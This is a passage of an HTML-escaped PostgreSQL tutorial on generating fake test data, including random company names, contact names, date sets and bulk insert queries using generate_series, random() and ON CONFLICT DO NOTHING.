        &lt;span class=&quot;k&quot;&gt;SELECT&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;string_agg&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;x&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;s1&quot;&gt;&amp;#39;&amp;#39;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
        &lt;span class=&quot;k&quot;&gt;FROM&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;
            &lt;span class=&quot;k&quot;&gt;select&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;start_arr&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[&lt;/span&gt; &lt;span class=&quot;mi&quot;&gt;1&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;+&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;random&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;()&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;*&lt;/span&gt; &lt;span class=&quot;mi&quot;&gt;25&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)::&lt;/span&gt;&lt;span class=&quot;nb&quot;&gt;int&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;%&lt;/span&gt; &lt;span class=&quot;mi&quot;&gt;16&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;]&lt;/span&gt;
            &lt;span class=&quot;k&quot;&gt;FROM&lt;/span&gt;
            &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;
                &lt;span class=&quot;k&quot;&gt;select&lt;/span&gt; &lt;span class=&quot;s1&quot;&gt;&amp;#39;{CO,GE,FOR,SO,CO,GIM,SE,CO,GE,CA,FRA,GEC,GE,GA,FRO,GIP}&amp;#39;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;::&lt;/span&gt;&lt;span class=&quot;nb&quot;&gt;text&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[]&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;as&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;start_arr&lt;/span&gt;
            &lt;span class=&quot;p&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;syllarr&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;
            &lt;span class=&quot;c1&quot;&gt;-- need 3 syllabes, and force generator interpretation with the &amp;#39;*0&amp;#39; (else 3 same syllabes)&lt;/span&gt;
            &lt;span class=&quot;n&quot;&gt;generate_series&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;1&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;mi&quot;&gt;3&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;+&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;generator&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;*&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;))&lt;/span&gt;
        &lt;span class=&quot;p&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;AS&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;comp3syl&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;x&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
    &lt;span class=&quot;p&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;AS&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;comp_name_1st&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;name_first&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;),&lt;/span&gt;
    &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;
        &lt;span class=&quot;k&quot;&gt;SELECT&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;x&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[&lt;/span&gt; &lt;span class=&quot;mi&quot;&gt;1&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;+&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;random&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;()&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;*&lt;/span&gt; &lt;span class=&quot;mi&quot;&gt;25&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)::&lt;/span&gt;&lt;span class=&quot;nb&quot;&gt;int&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;%&lt;/span&gt; &lt;span class=&quot;mi&quot;&gt;14&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;]&lt;/span&gt;
        &lt;span class=&quot;k&quot;&gt;FROM&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;
            &lt;span class=&quot;k&quot;&gt;select&lt;/span&gt; &lt;span class=&quot;s1&quot;&gt;&amp;#39;{Ltd,&amp;amp; Co,SARL,SA,Gmbh,United,Brothers,&amp;amp; Sons,International,Ext,Worldwide,Global,2000,3000}&amp;#39;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;::&lt;/span&gt;&lt;span class=&quot;nb&quot;&gt;text&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[]&lt;/span&gt;
        &lt;span class=&quot;p&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;AS&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;z2&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;x&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
    &lt;span class=&quot;p&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;AS&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;comp_name_last&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;name_last&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
    &lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;k&quot;&gt;FROM&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;generate_series&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;1&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;10000&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;as&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;generator&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;p&gt;As we &lt;a href=&quot;http://sqlfiddle.com/#!17/9eecb/186&quot;&gt;can see on SQL Fiddle&lt;/a&gt; this somewhat strange query works and generates 10,000 company names, from 3 syllables and a final word (like &quot;SOCOGEC 2000&quot; or &quot;COGEFOR Worldwide&quot;). &lt;strong&gt;The query does not use any table, there&#39;s not even a model for this in SQL Fiddle.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;In this query we can find some calls to &lt;code&gt;RANDOM()&lt;/code&gt; allowing choices variations on syllables, the  &lt;code&gt;% 14&lt;/code&gt; and &lt;code&gt;% 16&lt;/code&gt; are importants, they use the array effective size to choose randomly one the record in the array.
The &lt;strong&gt;most complex part&lt;/strong&gt; of the request is the &lt;code&gt;+ (generator*0)&lt;/code&gt;, reusing the identifier generated in &lt;code&gt;generate_series&lt;/code&gt;,
multiplied by 0 (so doing nothing with it). Without this call the subquery would be optimized
and not a correlated one, and only on syllables combination would be generated. We would have 10,000 rows, with 10,000 identifiers, but the same company name for each line.&lt;/p&gt;

&lt;p&gt;Once we have a good &lt;code&gt;SELECT&lt;/code&gt; we just have to &lt;code&gt;INSERT&lt;/code&gt; the result in the table, using an insert query of this form:&lt;/p&gt;

&lt;div class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-sql&quot; data-lang=&quot;sql&quot;&gt;&lt;span class=&quot;k&quot;&gt;INSERT&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;INTO&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;matable&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;field1&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;field2&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
    &lt;span class=&quot;k&quot;&gt;SELECT&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;.....&lt;/span&gt; &lt;span class=&quot;c1&quot;&gt;-- (here the select we just found) ....&lt;/span&gt;
&lt;span class=&quot;k&quot;&gt;ON&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;CONFLICT&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;DO&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;NOTHING&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;p&gt;The &lt;code&gt;ON CONFLICT&lt;/code&gt; part is ot available before PostgreSQL 9.5, it can be used to
ignore the unique key errors. On an older PostgreSQL you&#39;ll have to generate
a select without key errors (using disticnt for example), here with this
&lt;code&gt;DO NOTHING&lt;/code&gt; I won&#39;t have any duplicate problem, they&#39;ll get rejected silently.&lt;/p&gt;

&lt;p&gt;On our starting schema we add &lt;a href=&quot;http://sqlfiddle.com/#!17/ec332/1&quot;&gt;in SQL Fiddle the generation of some companies&lt;/a&gt;
and we can see that we effectively loose one third of the companies as they were duplicates and were not inserted in the database.&lt;/p&gt;

&lt;h2&gt;More complex, again&lt;/h2&gt;

&lt;p&gt;We have companies.&lt;/p&gt;

&lt;p&gt;Now we&#39;ll try to get a &lt;code&gt;SELECT&lt;/code&gt; query with all the necessary columns for a contact insertion.&lt;/p&gt;

&lt;p&gt;Using the same template as the company names we can quite easily generate last and first names. &lt;a href=&quot;https://github.com/regilero/regilero.github.com/blob/master/theme/resource/pgserie/generating_names1.sql&quot;&gt;HERE, for example, I generate names&lt;/a&gt;&lt;a href=&quot;http://sqlfiddle.com/#!17/9eecb/188&quot;&gt;SQLFiddle&lt;/a&gt;. Note that if I remove the &lt;code&gt;+ (generator*0)&lt;/code&gt;, &lt;a href=&quot;http://sqlfiddle.com/#!17/9eecb/189&quot;&gt;we generate the same name for each line&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;We can generate some fake company identifiers (a random int between 1 and 6300 for example)
and find back this company to use the comapny name on the email address.
Email that need to be complete the last and first name (without accents).&lt;/p&gt;

&lt;p&gt;I can choose randomly a status on the contact status &lt;code&gt;ENUM&lt;/code&gt; choices.&lt;/p&gt;

&lt;p&gt;But we&#39;ll also need dates, Creation datetime, update datetime, and some interaction dates with these contacts.&lt;/p&gt;

&lt;p&gt;For this task I will start by building a pseudo table with dates. I want to be able, for on contact, to choose one date in this tables and use it as a creation date. I will then have some other dates columns in this same table, where the dates are after the first one (some weeks after for a first date, and some more time for a second one).&lt;/p&gt;

&lt;p&gt;By choosing randomly in this pseudo table I will be able to generate some profiles of contact creation dates and actions dates made on the contact.&lt;/p&gt;

&lt;p&gt;I will use &lt;code&gt;UNION&lt;/code&gt; queries in the dates collection to get different spannings, I want
a big number of dates on the last year, some others on the last 5 yers, and less on the last 10 years.
And of course i need these dates in a random order, but with an increment that I can use to match these dates as if it were an identifier.&lt;/p&gt;

&lt;p&gt;THe source code of this sub group of 1083 lines each giving 3 dates &lt;a href=&quot;https://github.com/regilero/regilero.github.com/blob/master/theme/resource/pgserie/generate_date_set.sql&quot;&gt;is here&lt;/a&gt; and we can &lt;a href=&quot;http://sqlfiddle.com/#!17/9eecb/193&quot;&gt;see it in action with SQLFidlle&lt;/a&gt;&lt;/p&gt;

&lt;pre&gt;&lt;code&gt; rownum |           base_date           |       date_up_to_7_days       |      date_up_to_3_months
--------+-------------------------------+-------------------------------+-------------------------------
      1 | 2016-12-12 11:49:32.811583+01 | 2016-12-15 22:20:32.811583+01 | 2017-06-27 18:34:32.811583+02
      2 | 2017-02-24 06:21:32.811583+01 | 2017-03-01 07:36:32.811583+01 | 2017-06-27 18:34:32.811583+02
      3 | 2012-06-28 08:40:32.811583+02 | 2012-07-02 15:06:32.811583+02 | 2014-02-22 07:16:32.811583+01
      4 | 2007-12-05 17:55:32.811583+01 | 2007-12-10 17:35:32.811583+01 | 2008-07-19 06:27:32.811583+02
      5 | 2014-01-09 18:48:32.811583+01 | 2014-01-10 22:10:32.811583+01 | 2014-10-25 19:48:32.811583+02
      6 | 2007-08-23 01:56:32.811583+02 | 2007-08-28 17:25:32.811583+02 | 2007-12-20 02:12:32.811583+01
      7 | 2017-01-01 00:54:32.811583+01 | 2017-01-05 06:28:32.811583+01 | 2017-06-27 18:34:32.811583+02
      8 | 2014-05-16 11:14:32.811583+02 | 2014-05-16 21:10:32.811583+02 | 2016-03-24 09:57:32.811583+01
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;This sort of data group can be used in my request like a table by using the keyword &lt;code&gt;WITH&lt;/code&gt;:&lt;/p&gt;

&lt;div class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-sql&quot; data-lang=&quot;sql&quot;&gt;&lt;span class=&quot;k&quot;&gt;WITH&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;dates1083&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;AS&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;
    &lt;span class=&quot;p&quot;&gt;...&lt;/span&gt; &lt;span class=&quot;c1&quot;&gt;-- here the big dates select ...&lt;/span&gt;
&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;k&quot;&gt;SELECT&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;*&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;FROM&lt;/span&gt;
    &lt;span class=&quot;n&quot;&gt;tbl1&lt;/span&gt;
    &lt;span class=&quot;k&quot;&gt;INNER&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;JOIN&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;dates1083&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;ON&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;tbl1&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;foo_id&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;dates1083&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;id&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;p&gt;This avoids creating a temporary table, this table will only be used in the current query.&lt;/p&gt;

&lt;p&gt;This query, with all the dynamic columns, all reusing a base &lt;code&gt;generate_serie&lt;/code&gt;, will be quite big.&lt;/p&gt;

&lt;p&gt;In a simplified version, where the big generators are replaced by [ ... comments blocs .. ] we&#39;ll get :&lt;/p&gt;

&lt;div class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-sql&quot; data-lang=&quot;sql&quot;&gt;&lt;span class=&quot;k&quot;&gt;WITH&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;dates1083&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;as&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;
    &lt;span class=&quot;p&quot;&gt;[&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;..&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;Here&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;the&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;whole&lt;/span&gt; &lt;span class=&quot;mi&quot;&gt;1083&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;*&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;3&lt;/span&gt;  &lt;span class=&quot;n&quot;&gt;columns&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;pseudo&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;table&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;generation&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;...&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;]&lt;/span&gt;
&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;

&lt;span class=&quot;k&quot;&gt;INSERT&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;INTO&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;contact&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;
    &lt;span class=&quot;n&quot;&gt;con_id&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;n&quot;&gt;con_active&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;n&quot;&gt;con_firstname&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;n&quot;&gt;con_lastname&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;n&quot;&gt;con_mail&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;n&quot;&gt;date_create&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;n&quot;&gt;con_date_first_interaction&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;n&quot;&gt;con_date_last_interaction&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;n&quot;&gt;date_alter&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;n&quot;&gt;con_status&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;n&quot;&gt;comp_id&lt;/span&gt;
&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;k&quot;&gt;SELECT&lt;/span&gt;
    &lt;span class=&quot;n&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;n&quot;&gt;con_active&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;k&quot;&gt;CASE&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;WHEN&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;show_first_name&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;THEN&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;name_first&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;ELSE&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;NULL&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;END&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;as&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;con_first_name&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;k&quot;&gt;CASE&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;WHEN&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;show_last_name&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;THEN&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;name_last&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;ELSE&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;NULL&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;END&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;as&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;con_last_name&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;c1&quot;&gt;-- con_mail&lt;/span&gt;
    &lt;span class=&quot;n&quot;&gt;concat_ws&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;s1&quot;&gt;&amp;#39;@&amp;#39;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;co&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;[&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;...&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;Here&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;string&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;manipulations&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;with&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;column&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;from&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;company&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;name&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;and&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;first&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;name&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;...&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;]&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;as&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;mail&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;c1&quot;&gt;-- date_create&lt;/span&gt;
    &lt;span class=&quot;n&quot;&gt;dates1083&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;base_date&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;as&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;date_create&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;c1&quot;&gt;-- con_date_first_interaction&lt;/span&gt;
    &lt;span class=&quot;k&quot;&gt;CASE&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;WHEN&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;has_1st_interact&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;k&quot;&gt;true&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;THEN&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;dates1083&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;date_up_to_7_days&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;ELSE&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;NULL&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;END&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;as&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;date_1st_interact&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;c1&quot;&gt;-- con_date_last_interaction&lt;/span&gt;
    &lt;span class=&quot;k&quot;&gt;CASE&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;WHEN&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;has_2nd_interact&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;k&quot;&gt;true&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;AND&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;has_1st_interact&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;k&quot;&gt;true&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;THEN&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;dates1083&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;date_up_to_3_months&lt;/span&gt;
        &lt;span class=&quot;k&quot;&gt;WHEN&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;has_2nd_interact&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;k&quot;&gt;false&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;AND&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;has_1st_interact&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;k&quot;&gt;true&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;THEN&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;dates1083&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;date_up_to_7_days&lt;/span&gt;
        &lt;span class=&quot;k&quot;&gt;ELSE&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;NULL&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;END&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;as&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;date_2nd_interact&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;c1&quot;&gt;-- date_alter&lt;/span&gt;
    &lt;span class=&quot;k&quot;&gt;CASE&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;WHEN&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;has_2nd_interact&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;k&quot;&gt;true&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;AND&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;has_1st_interact&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;k&quot;&gt;true&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;THEN&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;dates1083&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;date_up_to_3_months&lt;/span&gt;
        &lt;span class=&quot;k&quot;&gt;WHEN&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;has_1st_interact&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;k&quot;&gt;true&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;THEN&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;dates1083&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;date_up_to_7_days&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;ELSE&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;dates1083&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;base_date&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;END&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;as&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;date_alter&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;c1&quot;&gt;-- con_status&lt;/span&gt;
    &lt;span class=&quot;n&quot;&gt;con_status&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;c1&quot;&gt;-- company link&lt;/span&gt;
    &lt;span class=&quot;n&quot;&gt;main_sub&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;comp_id&lt;/span&gt;
&lt;span class=&quot;k&quot;&gt;FROM&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;
    &lt;span class=&quot;c1&quot;&gt;-- name_first&lt;/span&gt;
    &lt;span class=&quot;k&quot;&gt;SELECT&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;
